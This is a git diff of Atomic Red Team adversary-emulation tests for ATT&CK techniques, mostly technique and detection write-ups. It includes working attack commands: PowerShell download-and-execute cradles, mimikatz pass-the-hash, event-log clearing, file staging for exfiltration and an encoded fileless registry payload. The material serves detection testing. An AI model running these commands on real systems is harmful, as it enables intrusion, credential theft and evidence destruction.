**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user | User to identify what groups a user is a member of | string | administrator|
#### Run it with `powershell`!
```
get-localgroup
get-ADPrinicipalGroupMembership #{user} | select name
```
<br/>
atomics/T1069/T1069.yaml
-34
View File
@@ -17,37 +17,3 @@ atomic_tests:
dscacheutil -q group
dscl . -list /Groups
groups
- name: Permission Groups Discovery Windows
description: |
Permission Groups Discovery for Windows
supported_platforms:
- windows
executor:
name: command_prompt
command: |
net localgroup
net group /domain
- name: Permission Groups Discovery PowerShell
description: |
Permission Groups Discovery utilizing PowerShell
supported_platforms:
- windows
input_arguments:
user:
description: User to identify what groups a user is a member of
type: string
default: administrator
executor:
name: powershell
command: |
get-localgroup
get-ADPrinicipalGroupMembership #{user} | select name
atomics/T1070/T1070.md
+5 -13
View File
@@ -1,22 +1,14 @@
# T1070 - Indicator Removal on Host
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070)
<blockquote>Adversaries may delete or alter generated artifacts on a host system, including logs and potentially captured files such as quarantined malware. Locations and format of logs will vary, but typical organic system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1139) and /var/log/* .
<blockquote>Adversaries may delete or alter generated event files on a host system, including potentially captured files such as quarantined malware. This may compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine what occurred.
Actions that interfere with eventing and other notifications that can be used to detect intrusion activity may compromise the integrity of security solutions, causing events to go unreported. They may also make forensic analysis and incident response more difficult due to lack of sufficient data to determine what occurred.
Detection: File system monitoring may be used to detect improper deletion or modification of indicator files. Events not stored on the file system will require different detection mechanisms.
### Clear Windows Event Logs
Platforms: Linux, macOS, Windows
Windows event logs are a record of a computer's alerts and notifications. Microsoft defines an event as "any significant occurrence in the system or in a program that requires users to be notified or an entry added to a log." There are three system-defined sources of Events: System, Application, and Security.
Adversaries performing actions related to account management, account logon and directory service access, etc. may choose to clear the events in order to hide their activities.
Data Sources: File monitoring, Process command-line parameters, Process monitoring
The event logs can be cleared with the following utility commands:
* <code>wevtutil cl system</code>
* <code>wevtutil cl application</code>
* <code>wevtutil cl security</code>
Logs may also be cleared through other mechanisms, such as [PowerShell](https://attack.mitre.org/techniques/T1086).</blockquote>
Defense Bypassed: Anti-virus, Log analysis, Host intrusion prevention systems</blockquote>
## Atomic Tests
atomics/T1074/T1074.md
+34 -3
View File
@@ -1,13 +1,23 @@
# T1074 - Data Staged
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1074)
<blockquote>Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Data Compressed](https://attack.mitre.org/techniques/T1002) or [Data Encrypted](https://attack.mitre.org/techniques/T1022).
<blockquote>Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Data Compressed or Data Encrypted.
Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.</blockquote>
Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.
Detection: Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as Windows Management Instrumentation and PowerShell.
Platforms: Linux, macOS, Windows
Data Sources: File monitoring, Process monitoring, Process command-line parameters</blockquote>
## Atomic Tests
- [Atomic Test #1 - Stage data from Discovery.bat](#atomic-test-1---stage-data-from-discoverybat)
- [Atomic Test #2 - Collect and Compress all file types](#atomic-test-2---collect-and-compress-all-file-types)
<br/>
@@ -19,6 +29,27 @@ Utilize powershell to download discovery.bat and save to a local file
#### Run it with `powershell`!
```
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
```
<br/>
<br/>
## Atomic Test #2 - Collect and Compress all file types
Collect all specified file extensions recursively from a specified file path on the target machine. All located files are copied into a temporary location before being compressed.
**Supported Platforms:** Windows, Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path | Path to recursively search from | Path | /|
#### Run it with `sh`!
```
mkdir -p /tmp/staging
find {{ path }} -name '*{{ extension }}' -exec cp -prv '{}' '/tmp/staging' ';'
tar -zcvf /tmp/staging.tar.gz /tmp/staging/
rm -rf /tmp/staging
```
<br/>
atomics/T1074/T1074.yaml
+82 -1
View File
@@ -13,4 +13,85 @@ atomic_tests:
executor:
name: powershell
command: |
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
- name: Collect and Compress all file types
description: |
Collect all specified file extensions recursively from a specified file path on the target machine. All located files are copied into a temporary location before being compressed.
# Not sure if atomic-red supports multi-platform executors under a single attack name
# It would be nice to correlate (- windows: powershell executor && - linux: sh executor)
supported_platforms:
- windows
- linux
input_arguments:
extension:
description: Extensions to search for
type: String
default: .log
input_arguments:
path:
description: Path to recursively search from
type: Path
default: /
# Windows Payload
# Not sure if multi-line commands support powershell functions or if this would be better placed
# within an 'atomics/T1074/payload/windows-payload.ps1' file and utilize a (New-Object Net.WebClient).DownloadString
# to pull down the payload. (Not sure how to pass input arguments though)
executor:
name: powershell
command: |
$FolderPath = '{{ path }}'
$FileExtension = '{{ extension }}'
New-Item -ItemType directory -Path C:\temp\staging
function TestPath()
{
$FileExists = Test-Path $FolderPath
If ($FileExists -eq $True)
{
Return $true
}
Else
{
Return $false
}
}
function ZipFiles()
{
Add-Type -Assembly System.IO.Compression.FileSystem
$compressionLevel = [System.IO.Compression.CompressionLevel]::Optimal
[System.IO.Compression.ZipFile]::CreateFromDirectory("C:\temp\staging",
"C:\temp\staging.zip", $compressionLevel, $false)
}
$Result = (TestPath($FolderPath));
If ($Result)
{
$Dir = get-childitem $FolderPath -Recurse -ErrorAction Ignore
$List = $Dir | where {$_.extension -eq $FileExtension}
$List | Copy-Item -Destination C:\temp\staging\ -ErrorAction Ignore
}
else
{
"Folder path is incorrect."
}
ZipFiles
Remove-Item -Recurse -Force C:\temp\staging
# Linux Payload
executor:
name: sh
command: |
mkdir -p /tmp/staging
find {{ path }} -name '*{{ extension }}' -exec cp -prv '{}' '/tmp/staging' ';'
tar -zcvf /tmp/staging.tar.gz /tmp/staging/
rm -rf /tmp/staging
atomics/T1075/T1075.md
+14 -10
View File
@@ -2,7 +2,17 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1075)
<blockquote>Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.
Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)</blockquote>
Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)
Detection: Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.
Platforms: Windows
Data Sources: Authentication logs
System Requirements: Requires Microsoft Windows as target system
Contributors: Travis Smith, Tripwire</blockquote>
## Atomic Tests
@@ -23,13 +33,13 @@ Note: must dump hashes first
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username | string | Administrator|
| user | username | string | Administrator|
| domain | domain | string | atomic.local|
| ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a|
#### Run it with `command_prompt`!
```
mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
mimikatz # sekurlsa::pth /user:#{user} /domain:#{domain} /ntlm:#{ntlm}
```
<br/>
<br/>
@@ -40,14 +50,8 @@ Similar to PTH, but attacking Kerberos
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username | string | Administrator|
| domain | domain | string | atomic.local|
#### Run it with `command_prompt`!
```
mimikatz # kerberos::ptt #{user_name}@#{domain}
mimikatz # kerberos::ptt #{username}@#{Domain}
```
<br/>
atomics/T1075/T1075.yaml
+3 -13
View File
@@ -12,7 +12,7 @@ atomic_tests:
- windows
input_arguments:
user_name:
user:
description: username
type: string
default: Administrator
@@ -28,7 +28,7 @@ atomic_tests:
executor:
name: command_prompt
command: |
mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
mimikatz # sekurlsa::pth /user:#{user} /domain:#{domain} /ntlm:#{ntlm}
- name: Mimikatz Kerberos Ticket Attack
description: |
@@ -37,17 +37,7 @@ atomic_tests:
supported_platforms:
- windows
input_arguments:
user_name:
description: username
type: string
default: Administrator
domain:
description: domain
type: string
default: atomic.local
executor:
name: command_prompt
command: |
mimikatz # kerberos::ptt #{user_name}@#{domain}
mimikatz # kerberos::ptt #{username}@#{Domain}
atomics/T1076/T1076.md
+17 -3
View File
@@ -1,10 +1,24 @@
# T1076 - Remote Desktop Protocol
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1076)
<blockquote>Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access [Remote Services](https://attack.mitre.org/techniques/T1021) similar to RDS.
<blockquote>Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access Remote Services similar to RDS.
Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1015) technique for Persistence. (Citation: Alperovitch Malware)
Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the Accessibility Features technique for Persistence. (Citation: Alperovitch Malware)
Adversaries may also perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, <code>c:\windows\system32\tscon.exe [session number to be stolen]</code>, an adversary can hijack a session without the need for credentials or prompts to the user. (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions. (Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf. (Citation: Kali Redsnarf)</blockquote>
Adversaries may also perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, <code>c:\windows\system32\tscon.exe [session number to be stolen]</code>, an adversary can hijack a session without the need for credentials or prompts to the user. (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions. (Citation: RDP Hijacking Medium) It can also lead to Remote System Discovery and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf. (Citation: Kali Redsnarf)
Detection: Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.
Also, set up process monitoring for <code>tscon.exe</code> usage and monitor service creation that uses <code>cmd.exe /k</code> or <code>cmd.exe /c</code> in its arguments to prevent RDP session hijacking.
Platforms: Windows
Data Sources: Authentication logs, Netflow/Enclave netflow, Process monitoring
Permissions Required: User, Remote Desktop Users
System Requirements: RDP service enabled, account in the Remote Desktop Users group.
Contributors: Matthew Demaske, Adaptforward</blockquote>
## Atomic Tests
atomics/T1077/T1077.md
+14 -2
View File
@@ -2,9 +2,21 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1077)
<blockquote>Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include <code>C$</code>, <code>ADMIN$</code>, and <code>IPC$</code>.
Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1035), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and certain configuration and patch levels. (Citation: Microsoft Admin Shares)
Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels. (Citation: Microsoft Admin Shares)
The [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote systems using <code>net use</code> commands with valid credentials. (Citation: Technet Net Use)</blockquote>
The Net utility can be used to connect to Windows admin shares on remote systems using <code>net use</code> commands with valid credentials. (Citation: Technet Net Use)
Detection: Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne) (Citation: Windows Event Forwarding Payne) Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as Net, on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.
Platforms: Windows
Data Sources: Process use of network, Authentication logs, Process command-line parameters, Process monitoring
Permissions Required: Administrator
System Requirements: File and printer sharing over SMB enabled.
Host/network firewalls not blocking SMB ports between source and destination.
Use of domain account in administrator group on remote system or default system admin account.</blockquote>
## Atomic Tests
atomics/T1081/T1081.md
+12 -2
View File
@@ -1,8 +1,18 @@
# T1081 - Credentials in Files
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1081)
<blockquote>Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
<blockquote>Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
It is possible to extract passwords from backups or saved virtual machines through [Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)</blockquote>
It is possible to extract passwords from backups or saved virtual machines through Credential Dumping. (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)
Detection: While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See Valid Accounts for more information.
Platforms: Linux, macOS, Windows
Data Sources: File monitoring, Process command-line parameters
Permissions Required: User, Administrator, SYSTEM
System Requirements: Access to files</blockquote>
## Atomic Tests
atomics/T1082/T1082.md
+14 -4
View File
@@ -2,13 +2,23 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1082)
<blockquote>An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
### Windows
===Windows===
Example commands and utilities that obtain this information include <code>ver</code>, [Systeminfo](https://attack.mitre.org/software/S0096), and <code>dir</code> within [cmd](https://attack.mitre.org/software/S0106) for identifying information based on present files and directories.
Example commands and utilities that obtain this information include <code>ver</code>, Systeminfo, and <code>dir</code> within cmd for identifying information based on present files and directories.
### Mac
===Mac===
On Mac, the <code>systemsetup</code> command gives a detailed breakdown of the system, but it requires administrative privileges. Additionally, the <code>system_profiler</code> gives a very detailed breakdown of configurations, firewall rules, mounted volumes, hardware, and many other things without needing elevated permissions.</blockquote>
On Mac, the <code>systemsetup</code> command gives a detailed breakdown of the system, but it requires administrative privileges. Additionally, the <code>system_profiler</code> gives a very detailed breakdown of configurations, firewall rules, mounted volumes, hardware, and many other things without needing elevated permissions.
Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
Platforms: Linux, macOS, Windows
Data Sources: Process command-line parameters, Process monitoring
Permissions Required: User</blockquote>
## Atomic Tests
atomics/T1083/T1083.md
+15 -3
View File
@@ -2,13 +2,25 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1083)
<blockquote>Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
### Windows
===Windows===
Example utilities used to obtain this information are <code>dir</code> and <code>tree</code>. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the Windows API.
### Mac and Linux
===Mac and Linux===
In Mac and Linux, this kind of discovery is accomplished with the <code>ls</code>, <code>find</code>, and <code>locate</code> commands.</blockquote>
In Mac and Linux, this kind of discovery is accomplished with the <code>ls</code>, <code>find</code>, and <code>locate</code> commands.
Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
Platforms: Linux, macOS, Windows
Data Sources: File monitoring, Process command-line parameters, Process monitoring
Permissions Required: User, Administrator, SYSTEM
System Requirements: Some folders may require Administrator, SYSTEM or specific user depending on permission levels and access controls</blockquote>
## Atomic Tests
atomics/T1084/T1084.md
+9 -1
View File
@@ -1,6 +1,14 @@
# T1084 - Windows Management Instrumentation Event Subscription
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1084)
<blockquote>Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts. (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)</blockquote>
<blockquote>Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts. (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)
Detection: Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns)
Platforms: Windows
Data Sources: WMI Objects
Permissions Required: Administrator, SYSTEM</blockquote>
## Atomic Tests
atomics/T1085/T1085.md
+15 -1
View File
@@ -4,7 +4,21 @@
Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)</blockquote>
Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
Detection: Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.
Platforms: Windows
Data Sources: File monitoring, Binary file metadata, Process command-line parameters, Process monitoring
Defense Bypassed: Anti-virus, Application whitelisting
Permissions Required: User
Remote Support: No
Contributors: Ricardo Dias, Casey Smith</blockquote>
## Atomic Tests
atomics/T1086/T1086.md
+17 -21
View File
@@ -6,7 +6,19 @@ PowerShell may also be used to download and run executables from the Internet, w
Administrator permissions are required to use PowerShell to connect to remote systems.
A number of PowerShell-based offensive testing tools are available, including Empire, (Citation: Github PowerShell Empire) PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)</blockquote>
A number of PowerShell-based offensive testing tools are available, including Empire, (Citation: Github PowerShell Empire) PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)
Detection: If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.
It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution. (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features. (Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.
Platforms: Windows
Data Sources: Windows Registry, File monitoring, Process command-line parameters, Process monitoring
Permissions Required: User, Administrator
Remote Support: Yes</blockquote>
## Atomic Tests
@@ -30,8 +42,6 @@ A number of PowerShell-based offensive testing tools are available, including Em
- [Atomic Test #10 - Powershell Invoke-DownloadCradle](#atomic-test-10---powershell-invoke-downloadcradle)
- [Atomic Test #11 - PowerShell Fileless Script Execution](#atomic-test-11---powershell-fileless-script-execution)
<br/>
@@ -135,7 +145,7 @@ Using PS 5.1, add a user via CLI
| password | password to use | string | ATOM1CR3DT3@M|
| description | Brief description of account | string | Atomic Things|
#### Run it with `powershell`!
#### Run it with `command_prompt`!
```
New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}'
```
@@ -155,9 +165,9 @@ Not proxy aware removing cache although does not appear to write to those locati
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
#### Run it with `command_prompt`!
#### Run it with `powershell`!
```
powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
powershell.exe -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
```
<br/>
<br/>
@@ -174,7 +184,7 @@ Powershell xml download request
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml|
#### Run it with `command_prompt`!
#### Run it with `powershell`!
```
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
```
@@ -213,17 +223,3 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
<br/>
<br/>
## Atomic Test #11 - PowerShell Fileless Script Execution
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggJyVTeXN0ZW1Sb290JS9UZW1wL2FydC1tYXJrZXIudHh0JyAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
```
<br/>
atomics/T1086/T1086.yaml
+4 -17
View File
@@ -112,7 +112,7 @@ atomic_tests:
type: string
default: Atomic Things
executor:
name: powershell
name: command_prompt
command: |
New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}'
@@ -132,9 +132,9 @@ atomic_tests:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
executor:
name: command_prompt
name: powershell
command: |
powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
powershell.exe -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
- name: Powershell XML requests
description: |
@@ -151,7 +151,7 @@ atomic_tests:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml
executor:
name: command_prompt
name: powershell
command: |
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
@@ -187,16 +187,3 @@ atomic_tests:
steps: |
1. Open Powershell_ise as a Privileged Account
2. Invoke-DownloadCradle.ps1
- name: PowerShell Fileless Script Execution
description: |
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections.
supported_platforms:
- windows
executor:
name: command_prompt
command: |
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggJyVTeXN0ZW1Sb290JS9UZW1wL2FydC1tYXJrZXIudHh0JyAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
atomics/T1087/T1087.md
+53 -40
View File
@@ -2,47 +2,59 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1087)
<blockquote>Adversaries may attempt to get a listing of local system or domain accounts.
### Windows
===Windows===
Example commands that can acquire this information are <code>net user</code>, <code>net group <groupname></code>, and <code>net localgroup <groupname></code> using the [Net](https://attack.mitre.org/software/S0039) utility or through use of [dsquery](https://attack.mitre.org/software/S0105). If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) may apply.
Example commands that can acquire this information are <code>net user</code>, <code>net group <groupname></code>, and <code>net localgroup <groupname></code> using the Net utility or through use of dsquery. If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, System Owner/User Discovery may apply.
### Mac
===Mac===
On Mac, groups can be enumerated through the <code>groups</code> and <code>id</code> commands. In mac specifically, <code>dscl . list /Groups</code> and <code>dscacheutil -q group</code> can also be used to enumerate groups and users.
### Linux
===Linux===
On Linux, local users can be enumerated through the use of the <code>/etc/passwd</code> file which is world readable. In mac, this same file is only used in single-user mode in addition to the <code>/etc/master.passwd</code> file.
Also, groups can be enumerated through the <code>groups</code> and <code>id</code> commands.</blockquote>
